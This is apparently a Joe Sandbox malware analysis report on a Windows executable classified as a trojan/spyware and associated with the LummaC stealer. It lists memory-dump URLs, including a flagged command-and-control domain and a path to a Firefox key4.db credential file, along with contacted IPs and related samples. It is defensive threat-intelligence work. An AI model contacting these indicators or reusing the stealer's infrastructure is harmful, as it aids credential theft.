https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/subscriber_agreement/ | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.valvesoftware.com/legal.htm | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/Q | 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp; 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp; 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=16GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lev-tolstoi.com/pi96GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://lev-tolstoi.com/6GNqkkKY0j.exe, 00000000.00000003.3019711227.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042608843.0000000001435000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042684703.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042472090.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://store.steampowered.com/privacy_agreement/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://store.steampowered.com/points/shop/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl06GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://ocsp.rootca1.amazontrust.com0:6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.ecosia.org/newtab/6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/privacy_agreement/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://lev-tolstoi.com:6GNqkkKY0j.exe, 00000000.00000003.3042472090.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3019711227.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075523758.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3024468196.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081527231.0000000001452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://lev-tolstoi.com:443/apizchhhv.default-release/key4.dbPK6GNqkkKY0j.exe, 00000000.00000003.3019711227.000000000142A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74776GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://store.steampowered.com/about/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://steamcommunity.com/my/wishlist/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://help.steampowered.com/en/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://steamcommunity.com/market/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/news/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://store.steampowered.com/subscriber_agreement/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://lev-tolstoi.com/ee6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://steamcommunity.com/discussions/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/stats/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/steam_refunds/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://x1.c.lencr.org/06GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://x1.i.lencr.org/06GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319006GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620166GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/workshop/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.all6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.steampowered.com/legal/6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
URL | Found in (memory dump) | Malicious | Detection | Reputation
https://lev-tolstoi.com/9 | 6GNqkkKY0j.exe, 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/4 | 6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://lev-tolstoi.com/api4& | 6GNqkkKY0j.exe, 00000000.00000003.3075064425.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075375880.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3080379491.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://store.steampowered.com/ | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=e | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/A | 6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com:443/api | 6GNqkkKY0j.exe, 00000000.00000003.2397441650.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397503538.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001454000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/account/cookiepreferences/ | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/mobile | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
Legend (share of contacted IPs per ASN):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580874
Start date and time: 2024-12-26 12:44:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 6GNqkkKY0j.exe (renamed because original name is a hash value)
Original Sample Name: 1778a174a471fdec99c35907f2267d30.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 6GNqkkKY0j.exe, PID 3500 because there are no executed function
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:45:06 | API Interceptor | 1878971x Sleep call for process: 6GNqkkKY0j.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.157.254 | Ebgl8jb6CW.exe | malicious | LummaC
172.67.157.254 | 3zg6i6Zu1u.exe | malicious | LummaC
172.67.157.254 | L5Kgf2Tvkc.exe | malicious | LummaC
172.67.157.254 | fkawMJ7FH8.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine, Stealc
172.67.157.254 | Bire1g8ahY.exe | malicious | LummaC, Stealc
172.67.157.254 | NfwBtCx5PR.exe | malicious | LummaC
172.67.157.254 | pJRiqnTih0.exe | malicious | LummaC
172.67.157.254 | xxLuwS60RS.exe | malicious | LummaC
172.67.157.254 | 9pyUjy2elE.exe | malicious | LummaC
172.67.157.254 | NQbg5Ht2hW.exe | malicious | LummaC
23.55.153.106 | Ebgl8jb6CW.exe | malicious | LummaC
23.55.153.106 | 35K4Py4lii.exe | malicious | LummaC
23.55.153.106 | BootStrapper.exe | malicious | LummaC
23.55.153.106 | Loader.exe | malicious | LummaC
23.55.153.106 | Script.exe | malicious | LummaC
23.55.153.106 | 3zg6i6Zu1u.exe | malicious | LummaC
23.55.153.106 | oiF7u78bY2.exe | malicious | LummaC
23.55.153.106 | L5Kgf2Tvkc.exe | malicious | LummaC
23.55.153.106 | jSFUzuYPG9.exe | malicious | LummaC
23.55.153.106 | HK8IIasL9i.exe | malicious | LummaC
Match                             Associated Sample Name / URL  Detection  Threat Name                                      Context
lev-tolstoi.com                   Ebgl8jb6CW.exe                malicious  LummaC                                           172.67.157.254
                                  35K4Py4lii.exe                malicious  LummaC                                           104.21.66.86
                                  3zg6i6Zu1u.exe                malicious  LummaC                                           172.67.157.254
                                  oiF7u78bY2.exe                malicious  LummaC                                           104.21.66.86
                                  L5Kgf2Tvkc.exe                malicious  LummaC                                           172.67.157.254
                                  fkawMJ7FH8.exe                malicious  LummaC, Amadey, LummaC Stealer, RedLine, Stealc  172.67.157.254
                                  LNn56KMkEE.exe                malicious  LummaC                                           104.21.66.86
                                  BVGvbpplT8.exe                malicious  LummaC, Stealc                                   104.21.66.86
                                  mgEXk8ip26.exe                malicious  LummaC                                           104.21.66.86
